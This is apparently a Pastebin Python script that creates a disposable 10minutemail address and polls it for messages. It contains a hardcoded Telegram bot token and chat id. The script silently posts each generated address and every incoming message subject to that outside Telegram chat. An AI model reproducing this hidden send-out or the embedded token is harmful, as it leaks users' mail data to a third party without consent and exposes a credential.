Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests,secrets,json,time
- Coke = secrets.token_hex(8)*2
- from user_agent import generate_user_agent
- import os
- toko='5458957317:AAHjQB0ujTnrqgbuSSvtnvMiSz9in0X2M7E'
- id='1375373577'
- os.system("clear")
- r = requests.session()
- def CODE():
- global sisn , tim
- while True:
- ERR = 0
- urlCOD = 'https://10minutemail.net/address.api.php?sessionid='+sisn+'&_='+tim
- try:
- time.sleep(4)
- send2 = r.get(urlCOD)
- msg = send2.json()['mail_list'][ERR]['subject']
- if msg.find('Hi, Welcome to 10 Minute Mail')>=0:
- print(f'[!] No Messages ')
- print(' ━━━━━━━━━━━━━━━━━━━━━')
- elif '"from"'in send2.text:
- eml = send2.json()['mail_list'][ERR]['from']
- TM = send2.json()['mail_list'][ERR]['datetime']
- print('From email: '+eml)
- print('data time: '+TM)
- print('New messages : '+msg)
- req = requests.post(f'https://api.telegram.org/bot{toko}/sendMessage?chat_id={id}&text=Fake Mail Message ✅\n\n - N𝘦𝘸 𝘮𝘦𝘴𝘴𝘢𝘨𝘦𝘴 : {msg}\n\n- D𝘦𝘷 : @mXeee')
- print(' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
- exit()
- elif '"datetime"'in send2:
- TM = send2.json()['mail_list'][ERR]['datetime']
- print('data time: '+TM)
- print('New messages : '+msg)
- print(' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
- else:
- print('[*] Email expired ..')
- input(' ')
- exit()
- except TypeError:
- print('[*] Email expired ..')
- input(' ')
- exit()
- except AttributeError:
- print('sorry')
- exit()
- def EmAIl():
- global sisn , tim
- vv1ck = 'https://10minutemail.net/address.api.php?'
- headers = {
- 'Host':'10minutemail.net',
- 'Cookie':Coke,
- 'User-Agent':generate_user_agent(),
- 'Accept':'application/json,',
- 'Accept-Language':'en-US,en;q=0.5',
- 'Accept-Encoding':'gzip,',
- 'X-Requested-With':'XMLHttpRequest',
- 'Referer':'https://10minutemail.net/m/?lang=ar',
- 'Te':'trailers',
- 'Connection':'close'}
- send = r.get(vv1ck,headers=headers)
- email = str(send.json()['mail_get_mail'])
- sisn = str(send.json()['session_id'])
- tim = str(send.json()['mail_get_time'])
- print(' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
- print(' [=] Email: '+email+'')
- print(' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n')
- req = requests.post(f'https://api.telegram.org/bot{toko}/sendMessage?chat_id={id}&text=F𝘢𝘬𝘦 N𝘦𝘸 E𝘮𝘢𝘪𝘭 ⚙️\n - N𝘦𝘸 ---> : {email}\n- D𝘦𝘷 : @mXeee')
- time.sleep(1)
- CODE()
- EmAIl()
- os.system("clear")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement